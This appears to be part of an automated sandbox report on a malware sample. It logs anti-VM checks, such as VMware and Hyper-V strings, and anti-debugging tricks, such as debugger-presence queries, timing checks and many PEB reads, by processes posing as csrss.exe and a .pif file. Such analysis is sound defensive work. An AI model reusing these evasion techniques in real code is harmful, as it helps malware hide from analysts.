                        Source: C:\Windows\System32\svchost.exe; File opened: PhysicalDrive0
                        Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                        Source: C:\Windows\SysWOW64\PING.EXE; Last function: Thread delayed
                        Source: C:\Windows\SysWOW64\systeminfo.exe; Last function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\csrss.exe; Code function: 12_2_038054D0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 12_2_038054D0
                        Source: C:\Windows\SysWOW64\systeminfo.exe; Code function: 21_2_0241C530 FindFirstFileW,FindNextFileW,FindClose, 21_2_0241C530
                        Source: 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3626954073.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Remove-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Add-NetEventVmNetworkAdapter
                        Source: csrss.exe, 0000000C.00000002.1289157524.0000000000844000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAS
                        Source: powershell.exe, 00000003.00000002.1339109862.00000000033A6000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\e
                        Source: powershell.exe, 00000003.00000002.1387322502.000000000885F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1339109862.000000000334C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2818162796.000001E5B802B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2818754364.000001E5BD657000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
                        Source: powershell.exe, 00000003.00000002.1387455889.0000000008869000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53fB
                        Source: powershell.exe, 00000003.00000002.1387455889.0000000008869000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Get-NetEventVmNetworkAdapter
                        Source: systeminfo.exe, 00000015.00000002.3625591179.0000000002499000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.1852451358.0000022AEA94C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exe; API call chain: ExitProcess graph end node graph_12-22509
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation

                        Anti Debugging

                        Source: C:\Users\user\AppData\Roaming\csrss.exe; Code function: 12_2_0381AF3C GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 12_2_0381AF3C
                        Source: C:\Users\user\AppData\Roaming\csrss.exe; Process queried: DebugPort
                        Source: C:\Users\user\Links\iaoqralA.pif; Process queried: DebugPort
                        Source: C:\Windows\SysWOW64\systeminfo.exe; Process queried: DebugPort
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30CFD1C0 rdtsc 17_2_30CFD1C0
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_00417793 LdrLoadDll, 17_2_00417793
                        Source: C:\Users\user\AppData\Roaming\csrss.exe; Code function: 12_2_03813F9C LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary, 12_2_03813F9C
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30C970C0 mov eax, dword ptr fs:[00000030h] 17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30C970C0 mov ecx, dword ptr fs:[00000030h] 17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30D550D9 mov eax, dword ptr fs:[00000030h] 17_2_30D550D9
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30D020DE mov eax, dword ptr fs:[00000030h] 17_2_30D020DE
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30CFD0C0 mov eax, dword ptr fs:[00000030h] 17_2_30CFD0C0
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30CA90DB mov eax, dword ptr fs:[00000030h] 17_2_30CA90DB
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30C880E9 mov eax, dword ptr fs:[00000030h] 17_2_30C880E9
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30C7A0E3 mov ecx, dword ptr fs:[00000030h] 17_2_30C7A0E3
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30CA50E4 mov eax, dword ptr fs:[00000030h] 17_2_30CA50E4
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30CA50E4 mov ecx, dword ptr fs:[00000030h] 17_2_30CA50E4
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30C7C0F0 mov eax, dword ptr fs:[00000030h] 17_2_30C7C0F0
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30CC20F0 mov ecx, dword ptr fs:[00000030h] 17_2_30CC20F0
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30C8208A mov eax, dword ptr fs:[00000030h] 17_2_30C8208A
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30C7D08D mov eax, dword ptr fs:[00000030h] 17_2_30C7D08D
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30CB909C mov eax, dword ptr fs:[00000030h] 17_2_30CB909C
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30CAD090 mov eax, dword ptr fs:[00000030h] 17_2_30CAD090
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30C85096 mov eax, dword ptr fs:[00000030h] 17_2_30C85096
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30D460B8 mov eax, dword ptr fs:[00000030h] 17_2_30D460B8
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30D460B8 mov ecx, dword ptr fs:[00000030h] 17_2_30D460B8
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30D2705E mov ebx, dword ptr fs:[00000030h] 17_2_30D2705E
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30D2705E mov eax, dword ptr fs:[00000030h] 17_2_30D2705E
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30C82050 mov eax, dword ptr fs:[00000030h] 17_2_30C82050
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30CAB052 mov eax, dword ptr fs:[00000030h] 17_2_30CAB052
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30D55060 mov eax, dword ptr fs:[00000030h] 17_2_30D55060
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30C91070 mov eax, dword ptr fs:[00000030h] 17_2_30C91070
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30C91070 mov ecx, dword ptr fs:[00000030h] 17_2_30C91070
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30CAC073 mov eax, dword ptr fs:[00000030h] 17_2_30CAC073
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30CFD070 mov ecx, dword ptr fs:[00000030h] 17_2_30CFD070
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30C9E016 mov eax, dword ptr fs:[00000030h] 17_2_30C9E016
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30C7A020 mov eax, dword ptr fs:[00000030h] 17_2_30C7A020
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30C7C020 mov eax, dword ptr fs:[00000030h] 17_2_30C7C020
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30D4903E mov eax, dword ptr fs:[00000030h] 17_2_30D4903E
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30D461C3 mov eax, dword ptr fs:[00000030h] 17_2_30D461C3
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30CBD1D0 mov eax, dword ptr fs:[00000030h] 17_2_30CBD1D0
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30CBD1D0 mov ecx, dword ptr fs:[00000030h] 17_2_30CBD1D0
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30D551CB mov eax, dword ptr fs:[00000030h] 17_2_30D551CB
                        Source: C:\Users\user\Links\iaoqralA.pif; Code function: 17_2_30CA51EF mov eax, dword ptr fs:[00000030h] 17_2_30CA51EF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C851ED mov eax, dword ptr fs:[00000030h]17_2_30C851ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D561E5 mov eax, dword ptr fs:[00000030h]17_2_30D561E5
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB01F8 mov eax, dword ptr fs:[00000030h]17_2_30CB01F8
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC0185 mov eax, dword ptr fs:[00000030h]17_2_30CC0185
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0019F mov eax, dword ptr fs:[00000030h]17_2_30D0019F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0019F mov eax, dword ptr fs:[00000030h]17_2_30D0019F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0019F mov eax, dword ptr fs:[00000030h]17_2_30D0019F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0019F mov eax, dword ptr fs:[00000030h]17_2_30D0019F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7A197 mov eax, dword ptr fs:[00000030h]17_2_30C7A197
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7A197 mov eax, dword ptr fs:[00000030h]17_2_30C7A197
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7A197 mov eax, dword ptr fs:[00000030h]17_2_30C7A197
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3C188 mov eax, dword ptr fs:[00000030h]17_2_30D3C188
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3C188 mov eax, dword ptr fs:[00000030h]17_2_30D3C188
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CD7190 mov eax, dword ptr fs:[00000030h]17_2_30CD7190
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D311A4 mov eax, dword ptr fs:[00000030h]17_2_30D311A4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D311A4 mov eax, dword ptr fs:[00000030h]17_2_30D311A4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D311A4 mov eax, dword ptr fs:[00000030h]17_2_30D311A4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D311A4 mov eax, dword ptr fs:[00000030h]17_2_30D311A4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9B1B0 mov eax, dword ptr fs:[00000030h]17_2_30C9B1B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D55152 mov eax, dword ptr fs:[00000030h]17_2_30D55152
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C79148 mov eax, dword ptr fs:[00000030h]17_2_30C79148
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C79148 mov eax, dword ptr fs:[00000030h]17_2_30C79148
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C79148 mov eax, dword ptr fs:[00000030h]17_2_30C79148
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C79148 mov eax, dword ptr fs:[00000030h]17_2_30C79148
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7C156 mov eax, dword ptr fs:[00000030h]17_2_30C7C156
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D14144 mov eax, dword ptr fs:[00000030h]17_2_30D14144
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D14144 mov eax, dword ptr fs:[00000030h]17_2_30D14144
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D14144 mov ecx, dword ptr fs:[00000030h]17_2_30D14144
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D14144 mov eax, dword ptr fs:[00000030h]17_2_30D14144
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D14144 mov eax, dword ptr fs:[00000030h]17_2_30D14144
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C87152 mov eax, dword ptr fs:[00000030h]17_2_30C87152
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C86154 mov eax, dword ptr fs:[00000030h]17_2_30C86154
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C86154 mov eax, dword ptr fs:[00000030h]17_2_30C86154
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D19179 mov eax, dword ptr fs:[00000030h]17_2_30D19179
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D40115 mov eax, dword ptr fs:[00000030h]17_2_30D40115
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2A118 mov ecx, dword ptr fs:[00000030h]17_2_30D2A118
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2A118 mov eax, dword ptr fs:[00000030h]17_2_30D2A118
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2A118 mov eax, dword ptr fs:[00000030h]17_2_30D2A118
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2A118 mov eax, dword ptr fs:[00000030h]17_2_30D2A118
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB0124 mov eax, dword ptr fs:[00000030h]17_2_30CB0124
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B136 mov eax, dword ptr fs:[00000030h]17_2_30C7B136
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B136 mov eax, dword ptr fs:[00000030h]17_2_30C7B136
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B136 mov eax, dword ptr fs:[00000030h]17_2_30C7B136
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B136 mov eax, dword ptr fs:[00000030h]17_2_30C7B136
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C81131 mov eax, dword ptr fs:[00000030h]17_2_30C81131
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C81131 mov eax, dword ptr fs:[00000030h]17_2_30C81131
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB2C0 mov eax, dword ptr fs:[00000030h]17_2_30CAB2C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB2C0 mov eax, dword ptr fs:[00000030h]17_2_30CAB2C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB2C0 mov eax, dword ptr fs:[00000030h]17_2_30CAB2C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB2C0 mov eax, dword ptr fs:[00000030h]17_2_30CAB2C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB2C0 mov eax, dword ptr fs:[00000030h]17_2_30CAB2C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB2C0 mov eax, dword ptr fs:[00000030h]17_2_30CAB2C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB2C0 mov eax, dword ptr fs:[00000030h]17_2_30CAB2C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A2C3 mov eax, dword ptr fs:[00000030h]17_2_30C8A2C3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A2C3 mov eax, dword ptr fs:[00000030h]17_2_30C8A2C3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A2C3 mov eax, dword ptr fs:[00000030h]17_2_30C8A2C3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A2C3 mov eax, dword ptr fs:[00000030h]17_2_30C8A2C3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A2C3 mov eax, dword ptr fs:[00000030h]17_2_30C8A2C3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C892C5 mov eax, dword ptr fs:[00000030h]17_2_30C892C5
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C892C5 mov eax, dword ptr fs:[00000030h]17_2_30C892C5
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B2D3 mov eax, dword ptr fs:[00000030h]17_2_30C7B2D3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B2D3 mov eax, dword ptr fs:[00000030h]17_2_30C7B2D3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B2D3 mov eax, dword ptr fs:[00000030h]17_2_30C7B2D3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAF2D0 mov eax, dword ptr fs:[00000030h]17_2_30CAF2D0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAF2D0 mov eax, dword ptr fs:[00000030h]17_2_30CAF2D0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C902E1 mov eax, dword ptr fs:[00000030h]17_2_30C902E1
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C902E1 mov eax, dword ptr fs:[00000030h]17_2_30C902E1
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C902E1 mov eax, dword ptr fs:[00000030h]17_2_30C902E1
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3F2F8 mov eax, dword ptr fs:[00000030h]17_2_30D3F2F8
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D552E2 mov eax, dword ptr fs:[00000030h]17_2_30D552E2
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C792FF mov eax, dword ptr fs:[00000030h]17_2_30C792FF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE284 mov eax, dword ptr fs:[00000030h]17_2_30CBE284
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE284 mov eax, dword ptr fs:[00000030h]17_2_30CBE284
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D00283 mov eax, dword ptr fs:[00000030h]17_2_30D00283
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D00283 mov eax, dword ptr fs:[00000030h]17_2_30D00283
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D00283 mov eax, dword ptr fs:[00000030h]17_2_30D00283
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB329E mov eax, dword ptr fs:[00000030h]17_2_30CB329E
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB329E mov eax, dword ptr fs:[00000030h]17_2_30CB329E
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D55283 mov eax, dword ptr fs:[00000030h]17_2_30D55283
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C902A0 mov eax, dword ptr fs:[00000030h]17_2_30C902A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C902A0 mov eax, dword ptr fs:[00000030h]17_2_30C902A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C952A0 mov eax, dword ptr fs:[00000030h]17_2_30C952A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C952A0 mov eax, dword ptr fs:[00000030h]17_2_30C952A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C952A0 mov eax, dword ptr fs:[00000030h]17_2_30C952A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C952A0 mov eax, dword ptr fs:[00000030h]17_2_30C952A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D092BC mov eax, dword ptr fs:[00000030h]17_2_30D092BC
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D092BC mov eax, dword ptr fs:[00000030h]17_2_30D092BC
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D092BC mov ecx, dword ptr fs:[00000030h]17_2_30D092BC
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D092BC mov ecx, dword ptr fs:[00000030h]17_2_30D092BC
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D172A0 mov eax, dword ptr fs:[00000030h]17_2_30D172A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D172A0 mov eax, dword ptr fs:[00000030h]17_2_30D172A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D162A0 mov eax, dword ptr fs:[00000030h]17_2_30D162A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D162A0 mov ecx, dword ptr fs:[00000030h]17_2_30D162A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D162A0 mov eax, dword ptr fs:[00000030h]17_2_30D162A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D162A0 mov eax, dword ptr fs:[00000030h]17_2_30D162A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D162A0 mov eax, dword ptr fs:[00000030h]17_2_30D162A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D162A0 mov eax, dword ptr fs:[00000030h]17_2_30D162A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D492A6 mov eax, dword ptr fs:[00000030h]17_2_30D492A6
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D492A6 mov eax, dword ptr fs:[00000030h]17_2_30D492A6
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D492A6 mov eax, dword ptr fs:[00000030h]17_2_30D492A6
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D492A6 mov eax, dword ptr fs:[00000030h]17_2_30D492A6
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3B256 mov eax, dword ptr fs:[00000030h]17_2_30D3B256
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3B256 mov eax, dword ptr fs:[00000030h]17_2_30D3B256
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB724D mov eax, dword ptr fs:[00000030h]17_2_30CB724D
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C79240 mov eax, dword ptr fs:[00000030h]17_2_30C79240
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C79240 mov eax, dword ptr fs:[00000030h]17_2_30C79240
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C86259 mov eax, dword ptr fs:[00000030h]17_2_30C86259
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7A250 mov eax, dword ptr fs:[00000030h]17_2_30C7A250
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
